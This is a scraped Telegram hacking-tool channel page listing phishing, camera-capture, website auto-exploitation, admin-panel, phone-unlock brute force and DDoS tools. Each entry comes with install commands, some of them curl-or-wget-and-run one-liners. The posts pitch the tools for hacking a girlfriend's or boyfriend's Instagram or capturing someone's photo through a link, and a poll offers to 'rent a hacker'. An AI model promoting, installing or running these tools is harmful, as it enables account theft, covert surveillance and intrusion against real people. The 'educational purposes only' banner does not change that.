TERMUX COMMANDD
25.6K subscribers
554 photos
80 videos
10 files
157 links
πŸ₯‡THIS IS THE TOP TERMUX CHANNEL ON TELEGRAM WITH 1000+ TOOLSπŸͺ©

πŸšͺHOUSE OF PENTESTER

⚑ Β©ALL CONTENT PROVIDED BY THIS CHANNEL IS MEANT FOR EDUCATIONAL PURPOSES ONLYπŸ”Ί


ADS - @MARONADS
Download Telegram
ZEFOY TIKTOK AUTOMATOR
Automate TikTok follower bot, like bot, share bot, view bot and more using selenium. 
πŸ‘7
USAGE:
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing pip install -r requirements.txt in Command Prompt.
3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here

ENJOY ☺️ @TERMUXCOMMANDD
❀6πŸ‘3πŸ‘1😁1
CAMHACKER -

CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!

+] INSTALLATION

git clone https://github.com/KasRoudra/CamHacker
cd CamHacker

For termux, use additional command - termux-setup-storage , bash ch.sh

Or Run Directly -
wget https://raw.githubusercontent.com/KasRoudra/CamHacker/main/ch.sh && bash ch.sh

ENJOY ☺️ @TERMUXCOMMANDD
πŸ‘16
XAttacker V2.5 Tool
 A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects its’ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.

USAGE
Short Form -l
Long Form --list
Description WebSites List

EXAMPLE
if you have list websites run tool with this command line
perl XAttacker.pl -l list.txt

Installation Linux οΏΌ
git clone https://github.com/Moham3dRiahi/XAttacker.git cd XAttacker perl XAttacker.pl

DOWNLOAD TERMUX
git clone https://github.com/Moham3dRiahi/XAttacker.git cd XAttacker chmod +x termux-install.sh bash termux-install.sh

Installation Windows οΏΌ :-
Download Perl Download XAttacker Extract XAttacker into Desktop Open CMD and type the following commands: cd Desktop/XAttacker-master/ perl XAttacker.pl
πŸ‘5❀2
DARKARMY
Hacking Tools Pack - A Penetration Testing Framework .

Installation Linux οΏΌ
This Tool Must Run As ROOT !!! ❗

git clone https://github.com/D4RK-4RMY/DARKARMY.git
cd DARKARMY
chmod +x install.sh
./install.sh


That's it. You can execute tool by typing DARKARMY.

INSTALLATION TERMUX.

pkg install git
pkg install python
git clone https://github.com/D4RK-4RMY/DARKARMY.git
cd DARKARMY
chmod +x darkarmy.py
python2 darkarmy.py

ENJOY ☺️ @TERMUXCOMMANDD
πŸ‘9❀1
WEBSCRAPE )
What is WebScrabe? Why WebScrabe? WebScrape is used to collect mail ID's and phone numbers from a websites.

TERMUX INSTALLATION GUIDE
pkg update -y
pkg upgrade -y
pkg install git
git clone https://github.com/3xploitGuy/webscrape.git
cd webscrape
webscrape
chmod +x webscrape.sh
webscrape
bash webscrape.sh

You must have use https://....

INSTALLING AND REQUIREMENTS
Linux or Unix-based system

~ ❯❯❯ git clone https://github.com/3xploitGuy/webscrape.git

~ ❯❯❯ cd webscrape

~/webscrape ❯❯❯ chmod +x webscrape.sh

~/webscrape ❯❯❯ ./webscrape.sh

ENJOY ☺️ @TERMUXCOMMANDD
πŸ‘6❀3
SOCIOPHISH -
Best Tool for Phishing With 38+ templates , Now you can Hack your Girlfreind or Boyfreind Instagram or Facebook account by jus a single link ! HAVE FUN.

FEATURES
Latest Login pages.
Mask URL support
Best for Anyone
Docker support (checkout docker-legacy branch)
Multiple tunneling options
Localhost
Ngrok (With or without hotspot)
Cloudflared (Alternative of Ngrok)

Installation
Just, Clone this repository -
$ git clone https://github.com/alexbieber/SocioPhish.git

Change to cloned directory And run SocioPhish.sh 

$ cd SocioPhish
$ bash sociophisher.sh

On first launch, It'll install the dependencies and that's it. SocioPhish is installed

Run on Docker

$ docker pull alexbieber/SocioPhish
$ docker run --rm -it alexbieber/SocioPhish

DEPENDENCIES
SocioPhisher requires following programs to run properly -
php
wget
curl
git

Supported PlatformTermuxUbuntu/Debian/Kali/Parrot, Arch Linux/Manjaro, Fedora

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘21❀1
QRLJACKER - QRLJACKING EXPLOITATION FRAMEWORK

QRLJacker is a highly customizable exploitation framework to demonstrate "QRLJacking Attack Vector" to show how it is easy to hijack services that depend on QR Code as an authentication and login method, Mainly it aims to raise the security awareness regarding all the services using the QR Code as a main way to login users to different services!

πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ». #WHATSAPPHACKING
πŸ‘6❀1
PREREQUISITES BEFORE INSTALLING:
1.Linux or MacOS. (Not working on windows)
2.Python 3.7+

Installing instructions:
❗Note: Don't install QRLJacker and Firefox as root in a regular user's session because it's not supported by Firefox which would give error on running modules in framework.❗

Important note: If you have multiple python version, use python3.7 command instead of python3 in the following steps and use python3.7 -m pip instead of pippip3 or even python3 -m pip because that's the reason of 95% of the issues opened here. I think people often skip the important parts πŸ˜„

1.Update Firefox browser to the latest version
2. Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver


3. Clone the repo with git clone https://github.com/OWASP/QRLJacking
then do  cd QRLJacking/QRLJacker
4. Install all the requirements with pip install -r requirements.txt
5. Now you can run the framework with python3 QrlJacker.py --help

TESTED ON )
Ubuntu 18.04 Bionic Beaver
Kali Linux 2018.x and up
❀5πŸ‘2πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
PYPHISHER
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.


[+] INSTALLATION

Install dependencies (git, python, php ssh)

For Debian (Ubuntu, Kali-Linux, Parrot)
sudo apt install git python3 php openssh-client -y

For Termux

pkg install git python3 php openssh -y
Clone this repository


Clone this repository
git clone https://github.com/KasRoudra/PyPhisher

Enter the directory
cd PyPhisher

Install all modules
pip3 install -r files/requirements.txt

Run the tool
python3 pyphisher.py

Or, directly run
wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py

PIP
pip3 install pyphisher [For Termux]
sudo pip3 install pyphisher [For Linux}. pyphisher

Requirements
Python(3)
requests
bs4
PHP
SSH
200MB storage
If not found, php and python modoules will be installed on first run
ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘24❀3πŸ‘1
Lazymux
Lazymux is a tool installer that is specially made for termux user which provides a lot of tool mainly used tools in termux and its easy to use, Lazymux install any of the given tools provided by it from itself with just one click, and its often get updated.

FEATURE
Tool Installation

Install Single Tool
lzmx > set_install 1
Install Multi Tool
lzmx > set_install 1 2 3 4
Install All Tool
lzmx > set_install @
Default Dir Install On lazymux.conf replace symbol ~ with directory you want
Example: lazymux.conf
HOME = /sdcard

Requirements
β€’ Python 3.x

Installation and Using Lazymux

apt install python git
git clone https://github.com/Gameye98/Lazymux
cd Lazymux
python lazymux.py


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘9❀2
H4X-Tools
Multiple useful tools in one program.

Setup
This tool is designed for Linux users, but it should work fine on Windows too.

Linux
1. Clone the repo git clone https://github.com/HerraVp/H4X-Tools.git
2. Run  sh setup.sh in terminal to install the tool.

If it doesnt work, install the dependencies manually and start the application in terminal using python3 h4xtools.py.

To update the tool, run sh update.sh

Windows

1. Make sure you have python and git installed

2. Clone the repo git clone https://github.com/HerraVp/H4X-Tools.git

3. Run the setup.bat file.

To update the tool, run the program as usual (Inside the folder!!!) and then run the update [11] option.

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘6❀3
ADMINHACK
will hack the admin panel of the site.

Installing for termux
pkg upgrade
pkg update
pkg install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.sh


Everything is ready! Now we are waiting for everything to download!


succes

Installing for linux
apt update
apt upgrade
apt install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.sh


Start Program
Enter a command to start AdminHack
bash AdminHack.sh

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘9❀2
Do you want to rent a hacker for a day like darkweb ?
Final Results
84%
Yes please bring this service
16%
No I won’t
πŸ‘8❀2
USER FINDER
OSINT tool for finding profiles by username

How to Install
apt update
apt upgrade
apt install git
git clone https://github.com/mishakorzik/UserFinder

How to Start
cd UserFinder
bash UserFinder.sh


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘4❀2
Termux_0.119.1_@TermuxCommandd.apk
107.2 MB
TERMUX LATEST VERSION
Note this it is not available on Play Store or App Store
πŸ‘15❀1
CILOCKS | Android/IOS Hacking  πŸ“±

Requirements
sudo apt update -y

sudo apt install php nodejs npm adb scrcpy wget unzip apktool jq -y

And if needed
sudo apt install msfconsole -y

Required
ADB {Android SDK}

USB Cable

Android Emulator {Nethunter/Termux} Root

Or Computer


Installation For Linux
git clone https://github.com/tegal1337/CiLocks

cd CiLocks

chmod +x cilocks

sudo bash cilocks

or sudo ./cilocks

or download here

For Android Emulator
Install Termux/NetHunter

Install Busybox

Root Access

Otg Cable

If brute doesn't work then uncomment this code
# adb shell input keyevent 26

if 5x the wrong password will automatically delay 30 seconds

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘17❀3πŸ”₯2πŸ₯°2
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. πŸŽ­

Introduction
This is A Python & Bash Programming Based Termux-Tool

Version : Cemera Hack Removed, C.C. Tool Added & Some Bug Fixed !!


FEATURES -

1. IP Tool 2. Subdomain Scanner 3. Ddos Attack Tool 4. Admin Finder 5. Has Cracker 6. Video Downloader 7. SQL Injection Tool 8. Text To Voice Convertor 9. Python Obfuscator 10. Telegram Kit 11. Termux Framework 12. Kali Nethunter Installer 13. Termux Tool 14. URL Changer 15. URL Shortner 16. WEB Tool 17. Temp Mail 18. Gmail Genaretor 19. Identity Generator 20. Multi Ddos 21. Anon Share 22. Email Tool 24. CC Tool

INSTALLATION
[+] For Install This Tool, Put The Following Commands Step by Step in Your Termux:

$ apt upgrade -y $ apt update -y $ pkg install git $ pkg install python -y $ git clone https://github.com/cracker911181/Cracker-Tool

[+] For Set This Tool, Put The Following Commands in Your Termux:

$ cd Cracker-Tool $ python cracker-main.py


[+] After Setting Tool, You Can Run Tool By Typing Bellow Command:

$ cracker


[+] You can use this one line command for installation and setting this tool:


$ curl

https://raw.githubusercontent.com/cracker911181/Cracker-Tool/main/crcu.py

| python ; cd Cracker-Tool ; python cracker-main.py


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘7❀4
CyberSH

Installation

Install for New User
yes | pkg i python; curl https://raw.githubusercontent.com/ShTasrif/cybersh/main/pkg.py | python

Install on Termux :
pkg update -y && pkg upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pkg install pip
pkg install pip2
pip2 install requests
pip2 install mechanize
git clone https://github.com/ShTasrif/cybersh

Run Termux:
cd cybersh
pip install -r requirements.txt
python pkg.py
python main.py


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘12❀2πŸ’―1